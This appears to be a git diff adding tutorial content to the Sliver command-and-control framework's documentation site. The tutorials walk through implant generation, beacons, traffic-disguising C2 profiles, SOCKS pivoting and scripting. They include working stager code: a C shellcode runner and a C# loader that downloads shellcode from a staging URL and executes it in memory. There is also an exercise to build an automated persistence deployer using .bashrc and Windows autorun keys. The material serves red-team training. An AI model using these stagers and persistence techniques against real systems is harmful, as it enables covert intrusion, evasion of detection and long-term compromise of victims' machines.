(b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"# Advanced web traffic configuration\n\nWhen generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer known for using ruby-on-rails. By default sliver will use:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nLet’s go ahead and update the session messages and staging with something more realistic and remove all references to woff or php.\n\n```bash\n\"session_file_ext\": \".css\",\n\"stager_file_ext\": \".ico\",\n```\n\nTODO pull urls for ror, maybe from seclists ? \n\nThe next step is to restart the http listener and generate our new implant.\n\n```bash\nTODO\nasciinema export c2profile, updating extensions and paths\n```\n\nTODO\nasciinema import custom c2profile, restart job and spin new beacon\n\nIf you now look at the debug output you’ll notice we no longer have .php urls.\n\n```bash\n2023/04/25 15:27:41 httpclient.go:672: [http] segments = [oauth2 v1 authenticate auth], filename = index, ext = css\n2023/04/25 15:27:41 httpclient.go:482: [http] POST -> http://localhost/oauth2/v1/authenticate/auth/index.css?p=711x58387 (2228 bytes)\n2023/04/25 15:27:41 httpclient.go:488: [http] POST request completed\n2023/04/25 15:27:42 httpclient.go:287: Cancelling poll context\n2023/04/25 15:27:42 httpclient.go:672: [http] segments = [assets], filename = jquery, ext = js\n2023/04/25 15:27:42 httpclient.go:406: [http] GET -> http://localhost/assets/jquery.js?r=72074674\n2023/04/25 15:27:42 sliver.go:198: [recv] sysHandler 12\n2023/04/25 15:27:42 session.go:189: [http] send envelope ...\n2023/04/25 15:27:42 httpclient.go:672: [http] segments = [oauth v1 oauth2], filename = admin, ext = css\n2023/04/25 15:27:42 httpclient.go:482: [http] POST -> http://localhost/oauth/v1/oauth2/admin.css?j=56685386 (93 bytes)\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. "},{"name":"4 - HTTP Payload staging","content":""},{"name":"5 - Pivots","content":""},{"name":"6 - Scripting","content":""},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file +{"tutorials":[{"name":"1 - Getting Started","content":"This course will use the latest Sliver build, you can download it from [insert local web server].\n\n`sliver-server` is the binary you want to use to run the Sliver C2 server, `sliver-client` is solely a client to connect to a Sliver C2 server. Sliver server also acts as a client on its own, so you don’t necessarily run sliver server and client separately.\n\nFirst time running Sliver will take a couple seconds as its retrieving its dependencies, consecutive executions will be much faster. Go ahead and launch the `sliver-server`.\n\n```asciinema\n{\"src\": \"/asciinema/startup.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nLet's take a couple minutes to discuss what Sliver actually is and how its setup.\n\n![Alt text](/images/Architecture.png)\n\nNow that Sliver is running, lets generate and execute your first implant to try out some of the basic features of Sliver, for now we’re going to run everything on the local host.\n\nHere's what we're going to do: \n* Generate your implant using the `generate` command as shown below.\n* Start HTTP listener on port 80\n* Execute implant in a separate terminal\n\n```asciinema\n{\"src\": \"/asciinema/first-implant.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nNow let’s select our implant and run our first command using the `use` command.\n\n```bash\n[server] sliver > use\n? Select a session or beacon: \nSESSION 1884a365 RELATED_EARDRUM [::1]:49153 test.local tester darwin/amd64\n[*] Active session RELATED_EARDRUM (1884a365-085f-4506-b28e-80c481730fd0)\n\n[server] sliver (RELATED_EARDRUM) > pwd\n\n[*] /Users/tester/tools\n```\n\nOnce you have reached this point, go ahead and explore some of the commands listed below. In each case first checkout the commands help using the **`-h`** flag then try it out!\n\n```bash\nExploring and interacting with the filesystem\n\nFilesystem\n cat Dump file to stdout\n cd Change directory\n cp Copy a file\n download Download a file\n grep Search for strings that match a regex within a file or directory\n head Grab the first number of bytes or lines from a file\n ls List current directory\n memfiles List current memfiles\n mkdir Make a directory\n mount Get information on mounted filesystems\n mv Move or rename a file\n pwd Print working directory\n rm Remove a file or directory\n tail Grab the last number of bytes or lines from a file\n upload Upload a file\n```\n\n```asciinema\n{\"src\": \"/asciinema/filesystem.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nGetting some environmental information\n```bash\nInfo\n env List environment variables\n getgid Get session process GID\n getpid Get session pid\n getuid Get session process UID\n info Get session info\n ping Send round trip message to implant (does not use ICMP)\n screenshot Take a screenshot\n whoami Get session user execution context\n```\nExecute a binary\n\n```asciinema\n{\"src\": \"/asciinema/execute.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nRunning an interactive shell\n\n```asciinema\n{\"src\": \"/asciinema/shell.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```"},{"name":"2 - Beacons vs Sessions","content":"# Beacons vs Sessions\n\nSliver implants support two types of connections, sessions and beacons.\n\nSessions use long-poling connections, which means they use a single TCP connection which is constantly open. Beacons on the other hand call back periodically, and will sleep when not active which can help keep their presence hidden.\n\nTypically during an engagement you will want to deploy a beacon on the target system, and switch to a session while doing more active enumeration activities.\n\nLet’s start with generating and deploying a beacon using `http`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_generation.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nYou can see the beacon callback times either in the `info` command or using `beacons watch`.\n\n```bash\n[server] sliver > beacons watch\n\n ID Name Transport Username Operating System Last Check-In Next Check-In\n========== =============== =========== ================= ================== =============== ===============\n 942c647c TIRED_GIRAFFE http(s) tester darwin/amd64 52s 12s\n\n```\n\nBeacon callback times and jitter can be set either during generation or on the fly using the `reconfig` command.\n\nThe example below sets the callback time to 5s with a 1s jitter.\n\n```bash\n[server] sliver (TIRED_GIRAFFE) > reconfig -i 5s -j 1s\n\n[*] Tasked beacon TIRED_GIRAFFE (b8aa6fd8)\n\n[+] TIRED_GIRAFFE completed task b8aa6fd8\n\n[*] Reconfigured beacon\n\n[server] sliver (TIRED_GIRAFFE) > info\n\n Beacon ID: 942c647c-8409-4877-9fa2-b84a7f27ad45\n Name: TIRED_GIRAFFE\n Hostname: tester.local\n UUID: c6de1a44-016a-5fbe-b76a-da56af41316d\n Username: tester\n UID: 501\n GID: 20\n PID: 55879\n OS: darwin\n Version:\n Locale:\n Arch: amd64\n Active C2: https://127.0.0.1\n Remote Address: 127.0.0.1:51803\n Proxy URL:\n Interval: 1m0s\n Jitter: 30s\n First Contact: Wed Apr 19 01:14:21 CEST 2023 (10m30s ago)\n Last Checkin: Wed Apr 19 01:18:20 CEST 2023 (6m31s ago)\n Next Checkin: Wed Apr 19 01:19:46 CEST 2023 (5m5s ago)\n```\n\nCommands issued for beacons can be viewed using `tasks`, the task state will indicate wether the command has completed or not. The results of previously run tasks can be viewed using `tasks fetch`.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_tasks.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nbeacon_tasks.cast\n\nSession can be spun up using the `interractive` command.\n\n```asciinema\n{\"src\": \"/asciinema/beacon_interractive.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nBecause of the differences between sessions and beacons, certain commands like `upload` or `download` are slower on beacons due to the callback time. Others such as socks5 are not supported and only allowed for sessions. As a rule of thumb anything requiring higher network bandwith should be run from a session.\n\nLet’s switch to our newly created session and spin-up a `socks5` proxy.\n\n```bash\n\nsocks\n[server] sliver (TIRED_GIRAFFE) > use\n\n? Select a session or beacon: SESSION 131a60b9 TIRED_GIRAFFE 127.0.0.1:51969 tester.local tester darwin/amd64\n[*] Active session TIRED_GIRAFFE (131a60b9-db4f-4913-9064-18a17a0f09ab)\n\n[server] sliver (TIRED_GIRAFFE) > socks5 start\n\n[*] Started SOCKS5 127.0.0.1 1081\n⚠️ In-band SOCKS proxies can be a little unstable depending on protocol\n```\n\nYou can then point your browser to port 1081 to tunnel traffic through the implant to your target’s local network.\n\nTry out some of the previous commands and compare behaviour on beacons and sessions. Once you are done, you should remember to close your session using the `close` command.\n"},{"name":"3 - C2 Profiles and configuration","content":"When generating implants sliver uses a C2Profile configuration, which will be use to generate the effective network configuration of the implant. For example if configured to use /admin and /demo as callback urls, it might use one, the other or both allowing two implants using the same configuration to still seem slightly different from a network traffic perspective.\n\nC2 profile configurations can be seen using the `c2profile` command, which also allows import and export features.\n\nThe full list of possible configuration option can be found in the references section below, but for now lets instead customise the existing configuration.\n\nLets imagine we’re trying to breach a customer we've noticed uses ruby-on-rails for their applications. By default sliver will use the following extensions:\n\n- `.woff` for staging\n- `.js` for poll requests\n- `.html` for key exchanges\n- `.png` for close session\n- `.php` for session messages\n\nWe will need to update the session messages and staging with something more realistic and place all references to `woff` or `php` with something less suspicious like `css`, `rb` or `erb`.\n\nWe will also use a list of common Urls and filenames for Ruby on Rails like `https://github.com/danielmiessler/SecLists/blob/master/DiscoveryWeb-Content/ror.txt` for the `*_files` and `*_paths` variables. You could also reuse Urls discovered while enumerating your target's external perimeter in a similar way.\n\nWe will split the urls using a script like the example below, and then update the files and paths variables in our configuration file.\n\n```python\nimport json\nimport math\nimport sys\nimport random\n\n\ndef updateProfile(c2ProfileName, urls, cookieName):\n data = open(urls).readlines()\n c2Profile = open(c2ProfileName, \"r\").read()\n jsonC2Profile = json.loads(c2Profile)\n\n paths, filenames, extensions = [], [], []\n for line in data:\n line = line.strip()\n if \".\" in line:\n extensions.append(line.split(\".\")[-1])\n\n if \"/\" in line:\n segments = line.split(\"/\")\n paths.extend(segments[:-1])\n filenames.append(segments[-1].split(\".\")[0])\n\n extensions = list(set(extensions))\n if \"\" in extensions:\n extensions.remove(\"\")\n random.shuffle(extensions)\n\n filenames = list(set(filenames))\n if \"\" in filenames:\n filenames.remove(\"\")\n\n paths = list(set(paths))\n if \"\" in paths:\n paths.remove(\"\")\n\n if len(extensions) < 5:\n print(f'Got {len(extensions)} extensions, need at least 5.')\n exit(0)\n\n if len(paths) < 5:\n print(f'Got {len(paths)} paths need at least 5.')\n exit(0)\n\n if len(filenames) < 5:\n print(f'Got {len(filenames)} paths need at least 5.')\n exit(0)\n\n exts = ['poll_file_ext','stager_file_ext', 'start_session_file_ext', 'session_file_ext', 'close_file_ext' ]\n for ext in exts:\n jsonC2Profile[\"implant_config\"][ext] = extensions[0]\n extensions.pop(0)\n\n pathTypes = ['poll_paths','stager_paths', 'session_paths', 'close_paths' ]\n for x, pathType in enumerate(pathTypes):\n jsonC2Profile[\"implant_config\"][pathType] = paths[math.floor(x*(len(paths)/len(pathTypes))):math.floor((x+1)*(len(paths)/len(pathTypes)))]\n\n fileTypes = ['poll_files','stager_files', 'session_files', 'close_files']\n for x, fileType in enumerate(fileTypes):\n jsonC2Profile[\"implant_config\"][fileType] = filenames[math.floor(x*(len(filenames)/len(fileTypes))):math.floor((x+1)*(len(filenames)/len(fileTypes)))]\n\n jsonC2Profile[\"server_config\"][\"cookies\"] = [cookieName]\n c2Profile = open(c2ProfileName, \"w\")\n c2Profile.write(json.dumps(jsonC2Profile))\n print(\"C2 Profile updated !\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 4:\n print(\"Usage: updateProfile.py myC2Profile myurls.txt cookieName\")\n exit(0)\n\n updateProfile(sys.argv[1], sys.argv[2], sys.argv[3])\n```\n\n```asciinema\n{\"src\": \"/asciinema/custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nAt this point we can generate a new implant using our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_custom_c2profile.cast\", \"cols\": \"132\", \"rows\": \"14\", \"idleTimeLimit\": 8}\n```\n\nIf we review the debug logs of our implant we can see that the connections now use our new profile.\n\n```asciinema\n{\"src\": \"/asciinema/implant_debug_logs.cast\", \"cols\": \"132\", \"rows\": \"28\", \"idleTimeLimit\": 8}\n```\n\nIdeally during engagements your recon phase should inform your C2 infrastructure, reusing similar hosting providers, technologies and communication protocols can help your implant fly under the radar. \n\n"},{"name":"4 - HTTP Payload staging","content":"# Stagers\n\nWhen using Sliver during a live engagement, you’re going to need to use custom stagers, which are essentially a first binary or commandline that will retrieve and/or load Sliver into memory on your target system. Sliver can generate shellcode for your stager to execute by using the `profiles` command.\n\nFor this exercise we will create a new beacon profile for linux, stage it and use a bash script to download and execute \n\n```\n[server] sliver > profiles new -b **%%LINUX_IPADDRESS%%** --format shellcode --skip-symbols --debug profile1\n\n[*] Saved new implant profile profile1\n```\n\nThe profile should now be available when listing them using `profiles` command.\n\n```\n[server] sliver > profiles\n\n Profile Name Implant Type Platform Command & Control Debug Format Obfuscation Limitations \n============== ============== =============== ======================= ======= ============ ============= =============\n profile1 session windows/amd64 [1] https://10.0.0.4 true EXECUTABLE disabled\n```\n\nA stage listener linked to the profile can now be created that will host your executable.\n\n```\n[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7200 --profile profile1\n\n[*] No builds found for profile profile1, generating a new one\n[*] Job 1 (http) started\n```\n\nOnce thats done the stage listener will host the second stage payload on the URL when specifying a file with extension `.woff` . For example, by reaching out to: [http://localhost:7200/test.woff](http://localhost:7200/test.woff) you will see that it downloads the second stage payload.\n\n## Metasploit\n\nYou can generate msfvenom shellcode to connect back to our stage listener and retrieve the second stage payload, however you’ll need to include the `--prepend-size` argument to the stage listener as Metasploit payloads require the length to be prepended to the stage. You can either kill the previous stage listener using the `jobs -k` command or run the stage listener on a different port:\n\n```html\n[server] sliver > stage-listener --url http://**%%LINUX_IPADDRESS%%**:7202 --profile profile1 --prepend-size\n\n[*] Sliver name for profile: IDEAL_THRONE\n[*] Job 2 (http) started\n```\n\nOnce you have the stage listener setup with prepend size, you can generate the stager shellcode:\n\n```bash\n[server] sliver > generate stager --lhost **%%LINUX_IPADDRESS%%** --lport 7202 --protocol http --save /tmp --format c\n\n[*] Sliver implant stager saved to: /tmp/HOLLOW_CHINO\n```\n\nCreate a new file on the Linux box with the following contents and replace the `%%STAGE_SHELLCODE%%` field with the shellcode previously created:\n\n```bash\n#include \"windows.h\"\n\nint main()\n{\n unsigned char buf[] = **%%STAGE_SHELLCODE%%** ;\n void *exec = VirtualAlloc(0, sizeof buf, MEM_COMMIT, PAGE_EXECUTE_READWRITE);\n memcpy(exec, buf, sizeof buf);\n ((void(*)())exec)();\n\n return 0;\n}\n```\n\nFinally compile the payload.\n\n```bash\nx86_64-w64-mingw32-gcc -o stage.exe stager.c\n```\n\nOnce the executable is copied over to a windows host and run you should see a session connect back to your host.\n\n## Custom stager\n\nYou can also use a custom stager that just retrieves sliver shellcode directly and loads it in memory similarly to the previous stager.\n\n```bash\nusing System;\nusing System.Net.Http;\nusing System.Runtime.InteropServices;\nusing System.Threading.Tasks;\n\nnamespace ConsoleApp1\n{\n internal class Program\n {\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr VirtualAlloc(\n IntPtr lpAddress,\n uint dwSize,\n AllocationType flAllocationType,\n MemoryProtection flProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern IntPtr CreateThread(\n IntPtr lpThreadAttributes,\n uint dwStackSize,\n IntPtr lpStartAddress,\n IntPtr lpParameter,\n uint dwCreationFlags,\n out IntPtr lpThreadId);\n\n [DllImport(\"kernel32.dll\")]\n public static extern bool VirtualProtect(\n IntPtr lpAddress,\n uint dwSize,\n MemoryProtection flNewProtect,\n out MemoryProtection lpflOldProtect);\n\n [DllImport(\"kernel32.dll\")]\n public static extern uint WaitForSingleObject(\n IntPtr hHandle,\n uint dwMilliseconds);\n\n [Flags]\n public enum AllocationType\n {\n Commit = 0x1000,\n Reserve = 0x2000,\n Decommit = 0x4000,\n Release = 0x8000,\n Reset = 0x80000,\n Physical = 0x400000,\n TopDown = 0x100000,\n WriteWatch = 0x200000,\n LargePages = 0x20000000\n }\n\n [Flags]\n public enum MemoryProtection\n {\n Execute = 0x10,\n ExecuteRead = 0x20,\n ExecuteReadWrite = 0x40,\n ExecuteWriteCopy = 0x80,\n NoAccess = 0x01,\n ReadOnly = 0x02,\n ReadWrite = 0x04,\n WriteCopy = 0x08,\n GuardModifierflag = 0x100,\n NoCacheModifierflag = 0x200,\n WriteCombineModifierflag = 0x400\n }\n\n static async Task Main(string[] args)\n {\n\n byte[] shellcode;\n\n using (var handler = new HttpClientHandler())\n {\n // ignore ssl, because self-signed\n handler.ServerCertificateCustomValidationCallback = (message, cert, chain, sslPolicyErrors) => true;\n\n using (var client = new HttpClient(handler))\n {\n // Download the shellcode\n shellcode = await client.GetByteArrayAsync(\"http://10.0.0.4:7200/whatever.woff\");\n }\n }\n\n // Allocate a region of memory in this process as RW\n var baseAddress = VirtualAlloc(\n IntPtr.Zero,\n (uint)shellcode.Length,\n AllocationType.Commit | AllocationType.Reserve,\n MemoryProtection.ReadWrite);\n\n // Copy the shellcode into the memory region\n Marshal.Copy(shellcode, 0, baseAddress, shellcode.Length);\n\n // Change memory region to RX\n VirtualProtect(\n baseAddress,\n (uint)shellcode.Length,\n MemoryProtection.ExecuteRead,\n out _);\n\n // Execute shellcode\n var hThread = CreateThread(\n IntPtr.Zero,\n 0,\n baseAddress,\n IntPtr.Zero,\n 0,\n out _);\n // Wait infinitely on this thread to stop the process exiting\n WaitForSingleObject(hThread, 0xFFFFFFFF);\n }\n }\n}\n```\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Stagers](https://github.com/BishopFox/sliver/wiki/Stagers)\n"},{"name":"5 - Pivots","content":"# Pivots\n\nPivots allow routing implant traffic through other implants. This can be usefull in environments that don’t have any outbound access, but are reachable from other parts of the network that you have access to.\n\nSliver supports two types of pivots, tcp which can be used on all operating systems and named pipes which are windows only.\n\nIn both cases the workflow is relatively similar, as a first step select a session and setup a pivot listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > pivots tcp\n\n[*] Started tcp pivot listener :9898 with id 1\n\n[server] sliver (INNER_GO-KART) > pivots\n\n ID Protocol Bind Address Number Of Pivots\n==== ========== ============== ==================\n 1 TCP :9898 0\n```\n\nThe listening port and interface can be configured during creation.\n\nThe next step is to generate a payload that will connect to our listener.\n\n```bash\n[server] sliver (INNER_GO-KART) > generate --tcp-pivot 127.0.0.1 --os macos\n\n[*] Generating new darwin/amd64 implant binary\n[*] Symbol obfuscation is enabled\n[*] Build completed in 12s\n[*] Implant saved to /Users/tester/tools/VALUABLE_SICK\n```\n\nExecuting this payload will cause it to connect back through our original implant and then back to our C2 server.\n"},{"name":"6 - Scripting","content":"## Sliver Reactions\n\nReactions are a basic way to automate tasks in the sliver console, they allow you to specify sliver commands to run on a list of events.\n\n```bash\nReactable Events:\n session-connected Triggered when a new session is opened to a target\n session-updated Triggered on changes to session metadata\nsession-disconnected Triggered when a session is closed (for any reason)\n canary Triggered when a canary is burned or created\n watchtower Triggered when implants are discovered on threat intel platforms\n loot-added Triggered when a new piece of loot is added to the server\n loot-removed Triggered when a piece of loot is removed from the server\n```\n\nLet’s go ahead and create a reaction to list the current directory and environment variables when a new session checks in.\n\n```bash\nreaction set -e \"session-connected\"\n\n[*] Setting reaction to: Session Opened\n\n? Enter commands: [Enter 2 empty lines to finish]pwd\nenv\n? Enter commands:\npwd\nenv\n\n[*] Set reaction to session-connected (id: 1)\n```\n\nThe reaction is now set, if you spin up a new session these commands will be automatically run on that session’s initial connection.\n\n```bash\n[*] Session 99c7a639 UNEXPECTED_PORTER - 127.0.0.1:59966 (test.local) - darwin/amd64 - Thu, 04 May 2023 09:04:58 CEST\n\n[*] Execute reaction: 'pwd'\n\n[*] /Users/tester\n\n[*] Execute reaction: 'env'\n\nPWD=/Users/tester\nCOLORTERM=truecolor\n...\n```\n\nYou can remove reactions using `reaction unset`.\n\nHowever, there are a couple of limitations to keep in mind when using reactions, first off these are run in the console you are currently using, which is not necessarily the server console. So if you are connected to a sliver server using the sliver client, if you disconnect the client the reactions are no longer running. \n\nSecondly reactions are a relatively basic mechanism, you can’t use any conditional statements or more complex background tasks with them. For more complex use-cases you can instead write your own client in Python or Typescript to connect to the server over gRPC, which we’ll cover in the next session.\n\n## Sliver-py\n\nFor the purposes of this tutorial we’ll write our extensions using Python3, however the same result is achievable using Typescript, Golang or any other language that can handle gRPC.\n\nFirst, install the sliver-py extension using pip.\n\n```bash\npip3 install sliver-py\n```\n\nSince our extension is essentially going to be another client connection to the sliver server, you’ll also need to enable multiplayer mode and generate a new profile\n\n```bash\n[server] sliver > multiplayer\n\n[*] Multiplayer mode enabled!\n\n[server] sliver > new-operator -n tester -l 127.0.0.1\n\n[*] Generating new client certificate, please wait ...\n[*] Saved new client config to: /Users/tester/tools/tester_127.0.0.1.cfg\n```\n\nWe now have everything we need to start writing our scripts, let’s run our first example interactively in a Python shell. In this session we recommend using `ipython3` , you can install this by using pip:\n\n```html\npip3 install ipython3\n```\n\nWe first need to import a few dependencies, `SliverClientConfig` which is used to parse the client config we’ve just created and `SliverClient` which will handle the connection to the backend server.\n\n```bash\ntester@test ~/t/sliver> ipython3\nPython 3.9.16 (main, Dec 7 2022, 10:06:04)\nType 'copyright', 'credits' or 'license' for more information\nIPython 8.0.1 -- An enhanced Interactive Python. Type '?' for help.\n\nIn [1]: from sliver import SliverClientConfig, SliverClient\n\nIn [2]: DEFAULT_CONFIG = \"/Users/tester/tools/tester_127.0.0.1.cfg\"\n\nIn [3]: config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n\nIn [4]: client = SliverClient(config)\n\nIn [5]: await client.connect()\nOut[5]:\nMajor: 1\nMinor: 5\nPatch: 37\nCommit: \"0a43dc688ffb31a0a38511c47e8547a44a6918d4\"\nCompiledAt: 1681408237\nOS: \"darwin\"\nArch: \"arm64\"\n```\n\nFrom this point on we can use the client object to interact with the server, let’s start with listing any sessions or beacons that might be currently connected.\n\n```bash\nIn [6]: beacons = await client.beacons()\n\nIn [7]: sessions = await client.sessions()\n\nIn [8]: beacons\nOut[8]: []\n\nIn [9]: sessions\nOut[9]:\n[ID: \"f80ec897-0870-4f03-a1b1-364e5a0d243c\"\n Name: \"UNEXPECTED_PORTER\"\n Hostname: \"test.local\"\n UUID: \"c6de1a44-016a-5fbe-b76a-da56af41316d\"\n Username: \"tester\"\n UID: \"501\"\n GID: \"20\"\n OS: \"darwin\"\n Arch: \"amd64\"\n Transport: \"http(s)\"\n RemoteAddress: \"127.0.0.1:60218\"\n PID: 74773\n Filename: \"/Users/tester/tools/UNEXPECTED_PORTER\"\n LastCheckin: 1683185925\n ActiveC2: \"http://127.0.0.1\"\n ReconnectInterval: 60000000000\n PeerID: 4416183373589698218\n FirstContact: 1683185429]\n```\n\nTo run commands on this session you’ll need to create an InteractiveSession object.\n\n```bash\nIn [10]: interract = await client.interact_session(\"f80ec897-0870-4f03-a1b1-364e5a0d243c\")\n\nIn [11]: await interract.pwd()\nOut[11]: Path: \"/Users/tester\"\n```\n\nNow that we’ve got the basics of connecting to sliver and running commands down let’s write a more useful script that will display the hosts file when a new session checks in. Our goal is to first identify the Operating System, and then based on that retrieve and display the contents of the hosts file if it exists. Because this script will wait and react to events emitted by the Sliver server, we’re going to use `asyncio` to write our client.\n\n```bash\n#!/usr/bin/env python3\n\nimport os\nimport asyncio\nfrom sliver import SliverClientConfig, SliverClient\nimport gzip\n\nDEFAULT_CONFIG = \"/Users/tester/tools/neo_127.0.0.1.cfg\"\n\nasync def main():\n ''' Client connect example '''\n config = SliverClientConfig.parse_config_file(DEFAULT_CONFIG)\n client = SliverClient(config)\n await client.connect()\n\n\t\tasync for event in client.on('session-connected'):\n print('Session %s just connected !' % event.Session.ID)\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n```\n\nAs shown above we can access the session object through `event.Session`. Let’s go ahead and add a few conditions based on the operating system.\n\n```bash\nif event.Session.OS == \"darwin\":\n print('Session is running on macOS')\n\nelif event.Session.OS == \"Linux\":\n print('Session is running on Linux')\nelif event.Session.OS == \"Windows\"\n print('Session is running on Windows')\nelse:\n print('Session is running on %s', event.Session.OS)\n```\n\nLet’s setup an InteractiveSession object like previously.\n\n```bash\ninteract = await client.interact_session(event.Session.ID)\n```\n\nWe’re going to start with writing the code for Linux and Macos, since in their case the file is located in the same place. First we check if the file exists, then we download and decompress it to display its contents using gzip.\n\n```bash\nfile_listing = await interact.ls(\"/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nThe code for Windows is relatively similar the only major difference being the file location.\n\n```bash\nfile_listing = await interact.ls(\"C:/Windows/System32/drivers/etc/hosts\")\nif file_listing.Exists:\n\tgzipFile = await interact.download(\"C:/Windows/System32/drivers/etc/hosts\")\n contents = gzip.decompress(gzipFile.Data)\n print('%r' % contents)\n```\n\nIf we run our script and spin up a few sessions we should start to see hosts files being retrieved.\n\n```bash\npython3.11 autocat.py\nAutomatically interacting with session 16338c85-b670-44ab-ac83-2df885654b07\nb\"# Copyright (c) 1993-2009 Microsoft Corp.\\r\\n#\\r\\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\\r\\n#\\r\\n# ...\n\nAutomatically interacting with session 93fcbab2-f00d-44a4-944a-e1ea8ec324e2\nb'##\\n# Host Database\\n#\\n# localhost is used to configure the loopback interface\\n# when the system is booting. Do not change this entry.\\n##\\n127.0.0.1...\n```\n\nAs an exercise, build automated backdoor deployer which first identifies the target operating system and then deploys a corresponding backdoor, in the case of Linux or Macos you can backdoor a `.bashrc` file to run a previously uploaded binary in the background, in the case of Windows you can use the registry commands to deploy a new `autorun` key.\n\nHere are a couple hints:\n\n- Start with generating sliver implants for all your target systems, on implant connection you’ll want to upload them somewhere on disc\n- In the cases of Linux and Macos you’ll want to download the `.bashrc` file, decompress and modify it locally before re-uploading it. The upload command should look like this `await interract.upload(\"/home/target/.bashrc\", contents + b'\\r\\necho \"pwned !\"')`.\n- For Windows you can look at the `registry_read` and `registry_create_key` functions.\n\n## References\n\n- [https://github.com/BishopFox/sliver/wiki/Writing-your-own-client](https://github.com/BishopFox/sliver/wiki/Writing-your-own-client)\n- [https://sliverpy.readthedocs.io/en/latest/](https://sliverpy.readthedocs.io/en/latest/)\n- [https://github.com/moloch--/sliver-py](https://github.com/moloch--/sliver-py)\n- [https://github.com/moloch--/sliver-script](https://github.com/moloch--/sliver-script)\n"},{"name":"7 - Assemblies and Bofs","content":""}]} \ No newline at end of file diff --git a/docs/sliver-docs/tsconfig.json b/docs/sliver-docs/tsconfig.json index 1c30165c4a..5448c05e93 100644 --- a/docs/sliver-docs/tsconfig.json +++ b/docs/sliver-docs/tsconfig.json @@ -21,7 +21,8 @@ "next-env.d.ts", "**/*.ts", "**/*.tsx", - "prebuild/generate-docs.js" + "prebuild/generate-docs.js", + "prebuild/generate-tutorials.js" ], "exclude": ["node_modules"] } diff --git a/docs/sliver-docs/util/search-context.ts b/docs/sliver-docs/util/search-context.ts index 5f20e87965..f37c8d1c8d 100644 --- a/docs/sliver-docs/util/search-context.ts +++ b/docs/sliver-docs/util/search-context.ts @@ -1,18 +1,26 @@ import lunr from "lunr"; import React from "react"; import { Doc, Docs } from "./docs"; +import { Tutorial, Tutorials } from "./tutorials"; export class SearchCtx { private _docs: 